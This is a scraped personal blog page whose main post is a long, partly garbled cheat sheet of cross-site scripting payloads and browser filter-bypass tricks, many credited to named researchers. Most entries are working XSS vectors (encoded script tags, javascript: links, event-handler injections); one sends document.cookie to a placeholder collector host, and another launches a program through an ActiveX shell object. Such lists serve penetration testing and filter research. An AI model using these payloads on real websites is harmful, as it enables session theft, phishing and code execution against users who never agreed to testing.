zoczus-blog
Untitled
4 posts
zoczus-blog · 5 years ago
test
.
TEST
testing
zoczus-blog · 6 years ago
Title
Link: aaa A.
zoczus-blog · 6 years ago
Markdownn
a [a](j a v a s c r i p t:prompt(document.cookie)) \ <javascript:prompt(document.cookie)> <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> \ a a \ notmalicious test test notmalicious notmalicious a clickme http://[email protected] style=background-image:url(data:image/png;base64,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);background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);// <http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\">> text a [a](javascript:this;alert(1)) [a](javascript:this;alert(1)) [a](Javascript:alert(1)) [a](javascript:alert(1)) [a](javascript:confirm(1) a a a javascript:alert(document.domain))[a](
zoczus-blog · 6 years ago
STANDARD XSS VECTORS: < script > < / script> &lt < &LT &LT; < << <<< ">" <script>alert("XSS") <alert("XSS");//< alert(document.cookie) '>alert(document.cookie) '>alert(document.cookie); ";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E &ltscript&gtalert(document.cookie); &ltscript&gtalert(document.cookie);&ltscript&gtalert alert('XSS') alert("XSS")"> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E ">document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>!--alert(String.fromCharCode(88,83,83))=&{} '';!--"=&{()} ','')); phpinfo(); exit;/* <![CDATA[var n=0;while(true){n;}]]> <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <![CDATA[]]> <IMG SRC="javascript:alert('XSS')"> ▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ TWITTER @xssvector Tweets: Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.' Reverse 401 basic auth phishing by @jackmasa POC: document.domain='com' chrome/safari same domain suffix cross-domain trick. Safari empty location bar bug by @jackmasa POC: Safari location object pollution tech: by @kinugawamasato Safari URL spoofing about://mmme.me POC: Opera URL spoofing vuln data://mmme.me by @jackmasa POC: Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F Opera data:message/rfc822 #XSS by @insertScript #IE
IE cool expression xss
Clever webkit xss auditor bypass trick <scRipt %00>prompt&lpar;/@soaj1664ashar/&rpar;​​​​​​​​​​​​​​​​ IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day <iframe srcdoc='<svg/onload=alert(/@80vul/)>'> #chrome IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/) and %c0″//(%000000%0dalert(1)// #IE #0day new XMLHttpRequest().open("GET", "data:text/html,", false); #firefox #datauri
XSS
*:after{content:url()} #firefox alert(/@ma1/) #IE "clickme #IE #xssfilter @kinugawamasato Components.lookupMethod(self, 'alert')(1) #firefox external.NavigateAndFind(' ',[],[]) #IE #URLredirect IE decides charset as #utf-7 @hasegawayosuke #opera #chrome MsgBox"@insertScript"<i> #IE9 #svg #vbscript setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox <svg></ y="><x" onload=alert('@0x6D6172696F')> #svg Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click​ #Chrome #XSS @RSnake Clipboard-hijack without script and css: http://elgoog.com Opera:*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}aaa $=<>@mozilla.org/js/function>;$::[<>alert>](/@superevr/) #firefox Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa location&equals;&#60&#62javascript&#x3A;alert(1)&#60&#33&#47> #Firefox #JustForFun Just don't support IE click //<!-- -->*{x:expression(alert(/@jackmasa/))}// #IE #XSS Input[hidden] XSS target it. Firefox clipboard-hijack without script and css : http:// <![ #E4X <{alert(1)}>{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes #vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356 ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ @0x6D6172696F /\51')() No referer :
/*&midast;&sol;alert(' @0x6D6172696F ')&sol;&sol;*/​ #VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub] if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console alert(1) #opera by @soaj1664ashar <![if<iframe/onload=vbs::alert[:]> #IE by @0x6D6172696F, @jackmasa <svg><script/XL:href=&VeryThinSpace;data&colon;;;;base64;;;;&comma;<>啊YWx啊lc啊nQ啊oMSk啊=> mix! #opera by @jackmasa <! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS header('Refresh: 0;url=javascript:alert(1)'); <script language=vbs> click #CSS expression *{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red} #ES #FF for(location of ['javascript:alert(/ff/)']); #E4X function::['location']='javascript'':alert(/FF/)' HTML5 entity char test #Firefox click eval(test'') by @cgvwzq
CSS and CSS :P toUpperCase XSS document.write('<ı onclıck=alert(1)>asdı>'.toUpperCase()) by @jackmasa IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("
") by @masa141421356 aha alert(/IE|Opera/) Opera bug? Use 127.1 no 127.0.0.1 by @jackmasa IE vector location='vbscript:alert(1)' #jQuery super less-xss,work in IE: $(URL) 6 chars #Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap innerText DOM XSS: innerHTML=innerText Using IE XSS filter or Chrome xss auditor to block url redirect. jQuery 1.8 a new method: $.parseHTML('') IE all version CSRF vector Timing vector Firefox data uri can inherit dom-access.
IE9 Webkit and FF Firefox E4X vector alert(<xss>xs{[function::status]}s) it is said E4H would replace E4X :P IE8 document.write('<img src="<iframe/onload=alert(1)>\0">') If you want to share your cool vector, please do not hesitate to let me know :) ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1') by @IRSDL New spec:<iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F #Firefox syntax broken try{*}catch(e if(alert(1))){} by @garethheyes JSON XSS Tips: /json.cgi?a.html by @hasegawayosuke JSON XSS Tips: /json/.html with PHP and .NET by or /json;.html with JSP by @superevr ß=ss <a href="http://ß.lv">click
by @_cweb click by @_cweb Firefox link host dom xss https://t.co/aTtzHaaG by @garethheyes click by @_cweb history.pushState([],[],'/xssvector') HTML5 URL spoofing! Clickjacking with history.forward() and history.back() by @lcamtuf Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356 Firefox IE by @0x6D6172696F H5SC#115 Firefox funny vector for(i=0;i<100;) find(); by @garethheyes IE breaking framebusting vector var location={}; IE JSON hijack with UTF-7 json={'x':'',x:location='1'} Firefox
; with drag and drop form hijacking Dangling markup injection Firefox click=>google by @garethheyes click by @kkotowicz Opera click variant base64 encode. by @jackmasa Opera by LeverOne H5SC#88 Webkit and Opera click by @kkotowicz FF click url trick by @jackmasa IE -{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1} @thornmaker , @sirdarckcat IE less xss,20 chars. by @0x6D6172696F click no referrer by @sneak_ FF no referrer by @sneak_ No dos expression vector by @jackmasa *{font-family:'<svg onload=alert(1)>';} by @0x6D6172696F JSLR( @garethheyes ) challenge result: @irsdl challenge result: Vbscript XHR by @masa141421356 XML Entity XSS by @garethheyes Webkit cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa @import//evil? >>>steal me!<<< scriptless by @garethheyes IE <input value="<script>alert(1)" ` /> by @hasegawayosuke <xmp><img alt="<img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D <a href="#" onclick="alert(' &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ')">name Classic html entity inject vector A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript <iframe src="jar://html5sec.org/test.jar!/test.html">
Upload a jar file => Firefox XSS by @0x6D6172696F JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke IE6-7 Inject vector by @kinugawamasato IE UTF7 BOM XSS by @garethheyes a='<svg/onload=alert(1)>';alert(2) by @0x6D6172696F , @jackmasa Opera SVG animation vector by @0x6D6172696F a='x酄刓';alert(1)//'; by @garethheyes FF CLICK by @0x6D6172696F
non-IE by @0x6D6172696F Firefox statusline spoofing<math><maction actiontype="statusline#http://google.com" href="//evil">click by LeverOne <svg><oooooo/oooooooooo/onload=alert(1) > by @jackmasa <math><script>sgl='<img/src=xx:x onerror=alert(1)>' chrome firefox opera vector by @jackmasa FF by @jackmasa Nice IE DOM XSS:
d.innerHTML=‘